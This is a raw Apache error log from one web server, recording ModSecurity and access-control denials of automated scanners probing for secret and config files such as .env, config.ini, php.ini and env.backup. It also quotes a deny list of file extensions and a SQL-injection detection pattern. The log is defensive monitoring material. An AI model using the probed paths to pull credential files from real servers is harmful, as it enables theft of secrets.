ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config.ini"] [unique_id "aPC-JJNO0RbuDFrUVpVL8QAAAMs"] [Thu Oct 16 12:43:00.901077 2025] [:error] [pid 16812:tid 16887] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config.ini"] [unique_id "aPC-JEKS8iATyHh_zsDJdAAAAII"] [Thu Oct 16 12:43:01.056124 2025] [:error] [pid 17032:tid 17047] [client 18.142.179.75:34240] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config.ini"] [unique_id "aPC-JZNO0RbuDFrUVpVL8gAAAM0"] [Thu Oct 16 12:43:01.209988 2025] [:error] [pid 16812:tid 16892] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/php.ini"] [unique_id "aPC-JUKS8iATyHh_zsDJdwAAAIQ"] [Thu Oct 16 12:43:01.364301 2025] [:error] [pid 17032:tid 17035] [client 18.142.179.75:34240] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/php.ini"] [unique_id "aPC-JZNO0RbuDFrUVpVL9QAAAME"] [Thu Oct 16 12:43:01.517497 2025] [:error] [pid 16812:tid 16883] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/php.ini"] [unique_id "aPC-JUKS8iATyHh_zsDJeAAAAIA"] [Thu Oct 16 12:43:01.672063 2025] [:error] [pid 17032:tid 17043] [client 18.142.179.75:34240] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/php.ini"] [unique_id "aPC-JZNO0RbuDFrUVpVL9wAAAMk"] [Thu Oct 16 12:43:01.826813 2025] [:error] [pid 16812:tid 16916] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/settings.ini"] [unique_id "aPC-JUKS8iATyHh_zsDJewAAAJc"] [Thu Oct 16 12:43:01.980593 2025] [:error] [pid 17032:tid 17037] [client 18.142.179.75:34240] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/settings.ini"] [unique_id "aPC-JZNO0RbuDFrUVpVL-QAAAMM"] [Thu Oct 16 12:43:02.133900 2025] [:error] [pid 16812:tid 16885] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/settings.ini"] [unique_id "aPC-JkKS8iATyHh_zsDJfQAAAIE"] [Thu Oct 16 12:43:02.288072 2025] [:error] [pid 17032:tid 17057] [client 18.142.179.75:34240] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/settings.ini"] [unique_id "aPC-JpNO0RbuDFrUVpVL-wAAANc"] [Thu Oct 16 12:43:02.441399 2025] [:error] [pid 16812:tid 16903] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/app.ini"] [unique_id "aPC-JkKS8iATyHh_zsDJfgAAAIo"] [Thu Oct 16 12:43:02.634714 2025] [:error] [pid 17032:tid 17042] [client 18.142.179.75:34240] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/app.ini"] [unique_id "aPC-JpNO0RbuDFrUVpVL_wAAAMg"] [Thu Oct 16 12:43:02.788470 2025] [:error] [pid 16812:tid 16917] [client 18.142.179.75:43334] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/app.ini"] [unique_id "aPC-JkKS8iATyHh_zsDJgQAAAJg"] [Thu Oct 16 12:43:02.943071 2025] [:error] [pid 17032:tid 17047] [client 18.142.179.75:34240] [client 18.142.179.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/app.ini"] [unique_id "aPC-JpNO0RbuDFrUVpVMAQAAAM0"] [Thu Oct 16 17:09:11.153691 2025] [:error] [pid 17032:tid 17050] [client 93.123.109.60:36000] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/brady-station-apartments/?utm_medium=redirect&utm_campaign=vanity&original_referrer=https://bradystationapts.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aPD8h5NO0RbuDFrUVpUj8QAAANA"] [Thu Oct 16 20:54:15.792209 2025] [:error] [pid 17032:tid 17047] [client 4.217.248.143:18660] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Oct 22 09:00:51.706519 2025] [:error] [pid 21477:tid 21503] [client 45.148.10.166:44100] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aPhzE-fTOjribGkgB7Ha1gAAAVY"] [Wed Oct 22 09:02:48.747740 2025] [:error] [pid 21477:tid 21497] [client 45.148.10.166:50926] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aPhziOfTOjribGkgB7HbpgAAAVA"] [Thu Oct 23 09:47:30.546293 2025] [access_compat:error] [pid 21038:tid 21100] [client 83.147.38.75:51512] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Oct 23 09:47:31.399153 2025] [access_compat:error] [pid 21038:tid 21136] [client 83.147.38.75:51528] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Thu Oct 23 09:47:32.542533 2025] [access_compat:error] [pid 21038:tid 21118] [client 83.147.38.75:51544] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Database [Thu Oct 23 09:51:30.025802 2025] [access_compat:error] [pid 21038:tid 21108] [client 83.147.38.75:55874] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Oct 23 09:51:30.431746 2025] [access_compat:error] [pid 21038:tid 21124] [client 83.147.38.75:55884] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Thu Oct 23 09:51:30.811576 2025] [access_compat:error] [pid 21038:tid 21122] [client 83.147.38.75:55891] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Database [Thu Oct 23 09:53:32.888882 2025] [access_compat:error] [pid 21309:tid 21324] [client 83.147.38.75:58159] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Oct 23 09:53:33.840590 2025] [access_compat:error] [pid 21038:tid 21129] [client 83.147.38.75:58175] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Thu Oct 23 09:53:34.986086 2025] [access_compat:error] [pid 21036:tid 21069] [client 83.147.38.75:58190] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Database [Sun Oct 26 16:10:49.811908 2025] [:error] [pid 12020:tid 12051] [client 74.176.176.255:20032] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sun Oct 26 16:10:54.846993 2025] [:error] [pid 12020:tid 12029] [client 74.176.176.255:20032] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Mon Oct 27 10:35:55.115481 2025] [:error] [pid 17426:tid 17449] [client 52.169.13.133:11426] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Mon Oct 27 10:35:58.916172 2025] [:error] [pid 17426:tid 17433] [client 52.169.13.133:11426] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Oct 31 20:34:23.876446 2025] [:error] [pid 15531:tid 15550] [client 74.7.227.164:58820] [client 74.7.227.164] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aQUBL3GRVIKa5VLy_DeBqQAAARE"] [Fri Oct 31 20:47:09.232694 2025] [autoindex:error] [pid 17598:tid 17611] [client 74.7.227.164:57064] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 31 21:15:18.917139 2025] [core:error] [pid 15531:tid 15546] [client 74.7.227.164:42086] AH10244: invalid URI path (/assets/front/js/%url%) [Sat Nov 01 07:22:29.614488 2025] [:error] [pid 670:tid 706] [client 74.7.227.53:45644] [client 74.7.227.53] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aQWZFYWHFN08OpDTbkwkNAAAANc"] [Sat Nov 01 07:27:27.500598 2025] [autoindex:error] [pid 352:tid 439] [client 74.7.227.53:45024] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Nov 01 07:45:20.048886 2025] [core:error] [pid 670:tid 698] [client 74.7.227.53:33132] 